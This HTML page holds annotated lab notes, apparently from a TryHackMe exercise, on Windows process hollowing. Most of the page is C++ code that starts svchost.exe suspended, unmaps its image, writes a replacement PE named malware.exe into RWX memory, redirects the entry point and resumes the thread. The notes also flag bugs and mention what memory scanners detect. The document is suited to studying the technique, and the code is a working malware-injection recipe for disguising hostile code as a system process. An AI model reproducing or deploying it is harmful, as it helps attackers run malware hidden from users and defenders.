<!doctype html>
<html lang="en">
<head>
<!-- NOTE(review): the third-party scripts below are loaded without Subresource Integrity, and fuse.js is fetched unpinned (whatever version the CDN serves today), so a modified CDN file runs with full page privileges. Pin the versions and add integrity="sha384-..." crossorigin="anonymous" once the hashes are computed. -->
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<title>The Real Hugo</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<p></p>
<div class="columns">
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<h1 id="process-hollowing">Process Hollowing</h1>
<ul>
<li>Create the target process (here <code>svchost.exe</code>) with <code>CREATE_SUSPENDED</code>: its primary thread exists but has not executed the original entry point yet, so the image can be swapped out before anything runs. <code>bInheritHandles</code> is <code>TRUE</code> although nothing here needs inherited handles; <code>FALSE</code> avoids leaking the injector's handles into the target. The path literals are rendered with doubled escapes (<code>\\\\</code>); the intended C++ literal has one <code>\\</code> per separator. The error branch is cut short in this snippet (closing brace missing).</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">LPSTARTUPINFOA</span><span class="w"> </span><span class="n">target_si</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">STARTUPINFOA</span><span class="p">();</span><span class="w"> </span><span class="c1">// Defines station, desktop, handles, and appearance of a process</span>
<span class="n">LPPROCESS_INFORMATION</span><span class="w"> </span><span class="n">target_pi</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">new</span><span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="p">();</span><span class="w"> </span><span class="c1">// Information about the process and primary thread</span>
<span class="n">CONTEXT</span><span class="w"> </span><span class="n">c</span><span class="p">;</span><span class="w"> </span><span class="c1">// Thread context struct (not a pointer); filled in later by GetThreadContext and used both to find the PEB and to set the new entry point</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">CreateProcessA</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPSTR</span><span class="p">)</span><span class="s">&quot;C:</span><span class="se">\\\\</span><span class="s">Windows</span><span class="se">\\\\</span><span class="s">System32</span><span class="se">\\\\</span><span class="s">svchost.exe&quot;</span><span class="p">,</span><span class="w"> </span><span class="c1">// Name of module to execute</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">TRUE</span><span class="p">,</span><span class="w"> </span><span class="c1">// bInheritHandles = TRUE: every inheritable handle of the injector leaks into the target; FALSE is sufficient for hollowing</span>
<span class="w"> </span><span class="n">CREATE_SUSPENDED</span><span class="p">,</span><span class="w"> </span><span class="c1">// Primary thread is created suspended, so the original svchost entry point never runs</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">target_si</span><span class="p">,</span><span class="w"> </span><span class="c1">// pointer to startup info</span>
<span class="w"> </span><span class="n">target_pi</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// pointer to process information; CreateProcessA returns 0 on failure</span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Failed to create Target process. Last Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">();</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Open the replacement PE (the image that will run inside the hollowed process) read-only from disk; the handle is only used to size the file and read its raw bytes, the loader never maps it.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">HANDLE</span><span class="w"> </span><span class="n">hMaliciousCode</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateFileA</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCSTR</span><span class="p">)</span><span class="s">&quot;C:</span><span class="se">\\\\</span><span class="s">Users</span><span class="se">\\\\</span><span class="s">tryhackme</span><span class="se">\\\\</span><span class="s">malware.exe&quot;</span><span class="p">,</span><span class="w"> </span><span class="c1">// Path of the replacement PE; read as a raw file, not mapped by the loader</span>
<span class="w"> </span><span class="n">GENERIC_READ</span><span class="p">,</span><span class="w"> </span><span class="c1">// Read-only access</span>
<span class="w"> </span><span class="n">FILE_SHARE_READ</span><span class="p">,</span><span class="w"> </span><span class="c1">// Other readers are allowed while the file is open</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">OPEN_EXISTING</span><span class="p">,</span><span class="w"> </span><span class="c1">// Open only if the file already exists; INVALID_HANDLE_VALUE on failure (not checked here)</span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Locate the target image base. The suspended primary thread's initial context is read with <code>CONTEXT_INTEGER</code>; on 32-bit x86 <code>EBX</code> points at the PEB and <code>PEB+0x8</code> is <code>ImageBaseAddress</code>, which is then read out with <code>ReadProcessMemory</code>. This is x86-specific: a 64-bit target keeps the PEB pointer in <code>RDX</code> with <code>ImageBaseAddress</code> at <code>+0x10</code>. Nothing is unmapped in this step; that happens two steps further down.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">c</span><span class="p">.</span><span class="n">ContextFlags</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CONTEXT_INTEGER</span><span class="p">;</span><span class="w"> </span><span class="c1">// Request only the integer registers (EAX-EDI on x86); Ebx and Eax are the two this code uses</span>
<span class="n">GetThreadContext</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle to the thread obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">c</span><span class="w"> </span><span class="c1">// Pointer to store retrieved context</span>
<span class="p">);</span><span class="w"> </span><span class="c1">// Initial context of the suspended primary thread; the BOOL result is not checked</span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">;</span><span class="w"> </span>
<span class="n">ReadProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle for the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">c</span><span class="p">.</span><span class="n">Ebx</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">8</span><span class="p">),</span><span class="w"> </span><span class="c1">// x86 only: EBX holds the PEB pointer at thread start and PEB+0x8 is ImageBaseAddress (on x64 it is RDX+0x10)</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Receives the address where the original image is mapped</span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">),</span><span class="w"> </span><span class="c1">// Bytes to read: exactly one pointer</span>
<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="c1">// lpNumberOfBytesRead not wanted; the BOOL result is ignored as well</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Stage the replacement PE locally: allocate a <code>PAGE_READWRITE</code> buffer of the file size in the injecting process and read the raw file into it. This buffer is only a source for the later <code>WriteProcessMemory</code> calls; nothing has been unmapped in the target yet.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">DWORD</span><span class="w"> </span><span class="n">maliciousFileSize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetFileSize</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hMaliciousCode</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of malicious image</span>
<span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="c1">// lpFileSizeHigh = NULL: the high DWORD of the size is discarded, fine for any realistic PE</span>
<span class="p">);</span><span class="w"></span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAlloc</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">maliciousFileSize</span><span class="p">,</span><span class="w"> </span><span class="c1">// File size of malicious image (raw on-disk size, not SizeOfImage)</span>
<span class="w"> </span><span class="mh">0x3000</span><span class="p">,</span><span class="w"> </span><span class="c1">// Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)</span>
<span class="w"> </span><span class="mh">0x04</span><span class="w"> </span><span class="c1">// PAGE_READWRITE: a local staging buffer in the injector, never executed from here</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code><span class="n">DWORD</span><span class="w"> </span><span class="n">numberOfBytesRead</span><span class="p">;</span><span class="w"> </span><span class="c1">// Stores number of bytes read</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ReadFile</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hMaliciousCode</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of malicious image</span>
<span class="w"> </span><span class="n">pMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Destination: the staging buffer allocated above</span>
<span class="w"> </span><span class="n">maliciousFileSize</span><span class="p">,</span><span class="w"> </span><span class="c1">// File size of malicious image</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">numberOfBytesRead</span><span class="p">,</span><span class="w"> </span><span class="c1">// Number of bytes read (not compared against maliciousFileSize afterwards)</span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">cout</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Unable to read Malicious file into memory. Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="n">GetLastError</span><span class="p">()</span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">TerminateProcess</span><span class="p">(</span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hMaliciousCode</span><span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Resolve <code>ZwUnmapViewOfSection</code> from <code>ntdll.dll</code> and unmap the original <code>svchost.exe</code> image from the target at the base found above. The <code>pfnZwUnmapViewOfSection</code> function-pointer typedef (<code>NTSTATUS</code> return, <code>HANDLE</code> and <code>PVOID</code> parameters) is not shown in this snippet, and the returned status is never checked.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">HMODULE</span><span class="w"> </span><span class="n">hNtdllBase</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetModuleHandleA</span><span class="p">(</span><span class="s">&quot;ntdll.dll&quot;</span><span class="p">);</span><span class="w"> </span><span class="c1">// ntdll.dll is mapped in every process, so a module handle is enough to resolve its exports</span>
<span class="n">pfnZwUnmapViewOfSection</span><span class="w"> </span><span class="n">pZwUnmapViewOfSection</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">pfnZwUnmapViewOfSection</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hNtdllBase</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of ntdll</span>
<span class="w"> </span><span class="s">&quot;ZwUnmapViewOfSection&quot;</span><span class="w"> </span><span class="c1">// API call to obtain</span>
<span class="p">);</span><span class="w"> </span><span class="c1">// pfnZwUnmapViewOfSection is a typedef not shown in this snippet: NTSTATUS (NTAPI*)(HANDLE, PVOID)</span>
<span class="n">DWORD</span><span class="w"> </span><span class="n">dwResult</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pZwUnmapViewOfSection</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="w"> </span><span class="c1">// Unmap the original image at its base; dwResult is an NTSTATUS (0 = STATUS_SUCCESS) and is not checked</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Allocate <code>SizeOfImage</code> bytes of <code>PAGE_EXECUTE_READWRITE</code> memory in the target at the freed base. Two caveats: the snippet never applies relocations, so the replacement PE is assumed to have the same preferred <code>ImageBase</code> as the address it is written to; and a private RWX region where an image mapping used to be is a strong indicator that memory scanners look for. <code>VirtualAllocEx</code> returns <code>NULL</code> on failure and is not checked.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">PIMAGE_DOS_HEADER</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_DOS_HEADER</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="p">;</span><span class="w"> </span><span class="c1">// Obtains the DOS header from the malicious image</span>
<span class="n">PIMAGE_NT_HEADERS</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_NT_HEADERS</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-&gt;</span><span class="n">e_lfanew</span><span class="p">);</span><span class="w"> </span><span class="c1">// Obtains the NT header from e_lfanew</span>
<span class="n">DWORD</span><span class="w"> </span><span class="n">sizeOfMaliciousImage</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfImage</span><span class="p">;</span><span class="w"> </span><span class="c1">// SizeOfImage: bytes the whole image occupies once mapped (not the size of the optional header)</span>
<span class="n">PVOID</span><span class="w"> </span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">VirtualAllocEx</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Ask for the freed base; no relocations are applied anywhere in this snippet, so the replacement PE is assumed to prefer this ImageBase</span>
<span class="w"> </span><span class="n">sizeOfMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Byte size obtained from optional header</span>
<span class="w"> </span><span class="mh">0x3000</span><span class="p">,</span><span class="w"> </span><span class="c1">// Reserves and commits pages (MEM_RESERVE | MEM_COMMIT)</span>
<span class="w"> </span><span class="mh">0x40</span><span class="w"> </span><span class="c1">// PAGE_EXECUTE_READWRITE: private RWX memory where an image mapping used to be; returns NULL on failure (unchecked)</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Copy the image in: first <code>SizeOfHeaders</code> bytes of headers to the base, then each section from its raw file offset (<code>PointerToRawData</code>) to its RVA (<code>VirtualAddress</code>). Note the headers are written to <code>pTargetImageBaseAddress</code> while the sections use <code>pHollowAddress</code>; those are equal only when <code>VirtualAllocEx</code> succeeded at the requested address. A failed header write is only logged, not aborted.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="n">pTargetImageBaseAddress</span><span class="p">,</span><span class="w"> </span><span class="c1">// Headers are written to pTargetImageBaseAddress; the sections below use pHollowAddress, which equals it only if VirtualAllocEx succeeded at the requested address</span>
<span class="w"> </span><span class="n">pMaliciousImage</span><span class="p">,</span><span class="w"> </span><span class="c1">// Local memory where the malicious file resides</span>
<span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">SizeOfHeaders</span><span class="p">,</span><span class="w"> </span><span class="c1">// Byte size of PE headers (DOS, NT and section table) </span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="p">))</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">cout</span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="s">&quot;[!] Writting Headers failed. Error: &quot;</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">()</span><span class="w"> </span><span class="o">&lt;&lt;</span><span class="w"> </span><span class="n">endl</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<div class="codehilite"><pre><span></span><code><span class="k">for</span><span class="w"> </span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="w"> </span><span class="o">&lt;</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">FileHeader</span><span class="p">.</span><span class="n">NumberOfSections</span><span class="p">;</span><span class="w"> </span><span class="n">i</span><span class="o">++</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"> </span><span class="c1">// Loop based on number of sections in PE data</span>
<span class="w"> </span><span class="n">PIMAGE_SECTION_HEADER</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_SECTION_HEADER</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pDOSHeader</span><span class="o">-&gt;</span><span class="n">e_lfanew</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_NT_HEADERS</span><span class="p">)</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">i</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_SECTION_HEADER</span><span class="p">)));</span><span class="w"> </span><span class="c1">// Section table follows the NT headers directly (what IMAGE_FIRST_SECTION computes)</span>
<span class="w"> </span><span class="n">WriteProcessMemory</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle of the process obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"> </span><span class="c1">// Destination: hollow base + section RVA </span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pMaliciousImage</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">PointerToRawData</span><span class="p">),</span><span class="w"> </span><span class="c1">// Source: raw section bytes inside the staging buffer</span>
<span class="w"> </span><span class="n">pSectionHeader</span><span class="o">-&gt;</span><span class="n">SizeOfRawData</span><span class="p">,</span><span class="w"> </span><span class="c1">// Raw size on disk; any VirtualSize beyond it stays zero-filled from the committed allocation (result unchecked)</span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Redirect execution: in the initial thread context on x86, <code>EAX</code> holds the entry point the loader will jump to, so it is pointed at <code>pHollowAddress + AddressOfEntryPoint</code> and written back with <code>SetThreadContext</code> (on x64 the equivalent register is <code>RCX</code>). <code>ContextFlags</code> is still <code>CONTEXT_INTEGER</code>, so only the integer registers are written.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">c</span><span class="p">.</span><span class="n">Eax</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">SIZE_T</span><span class="p">)((</span><span class="n">LPBYTE</span><span class="p">)</span><span class="n">pHollowAddress</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pNTHeaders</span><span class="o">-&gt;</span><span class="n">OptionalHeader</span><span class="p">.</span><span class="n">AddressOfEntryPoint</span><span class="p">);</span><span class="w"> </span><span class="c1">// On x86 the initial context keeps the entry point in EAX; redirect it to the replacement image entry (RCX on x64)</span>
<span class="n">SetThreadContext</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="p">,</span><span class="w"> </span><span class="c1">// Handle to the thread obtained from the PROCESS_INFORMATION structure</span>
<span class="w"> </span><span class="o">&amp;</span><span class="n">c</span><span class="w"> </span><span class="c1">// Pointer to the stored context structure; only the CONTEXT_INTEGER registers are written back (result unchecked)</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
<ul>
<li>Resume the primary thread; the process now runs the replacement image under the <code>svchost.exe</code> name. From a defender's view the memory at the image base no longer matches the file on disk and is private RWX memory rather than a <code>MEM_IMAGE</code> mapping, which is the discrepancy memory-scanning detections look for.</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="n">ResumeThread</span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">target_pi</span><span class="o">-&gt;</span><span class="n">hThread</span><span class="w"> </span><span class="c1">// Resume the primary thread; it now starts at the replacement entry point (previous suspend count is returned and ignored)</span>
<span class="p">);</span><span class="w"></span>
</code></pre></div>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
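function linkClick(obj) {
  // Remember whether a sidebar <details> element is open so the state can be
  // restored on the next page load. Called from the element's ontoggle handler.
  //   obj: the <details> element; its id is used as the sessionStorage key.
  // Elements without an id are ignored: storing them would create a bogus
  // "undefined" key that the restore loop later fails to look up.
  if (!obj || !obj.id) {
    return;
  }
  if (obj.open) {
    sessionStorage.setItem(obj.id, "open");
  } else {
    sessionStorage.removeItem(obj.id);
  }
}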
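// Re-open the sidebar <details> elements that were open on the previous page.
// sessionStorage is shared by every page on this origin, so a stored key may
// have no matching element here (or may not be a linkClick entry at all);
// those are skipped instead of dereferencing null. Returns the number of
// elements opened, 0 when run outside a browser.
function restoreOpenSections() {
  if (typeof sessionStorage === "undefined" || typeof document === "undefined") {
    return 0;
  }
  let restored = 0;
  for (const key of Object.keys(sessionStorage)) {
    // linkClick only ever stores the literal "open"
    if (sessionStorage.getItem(key) !== "open") {
      continue;
    }
    const el = document.getElementById(key);
    if (el) {
      el.open = true;
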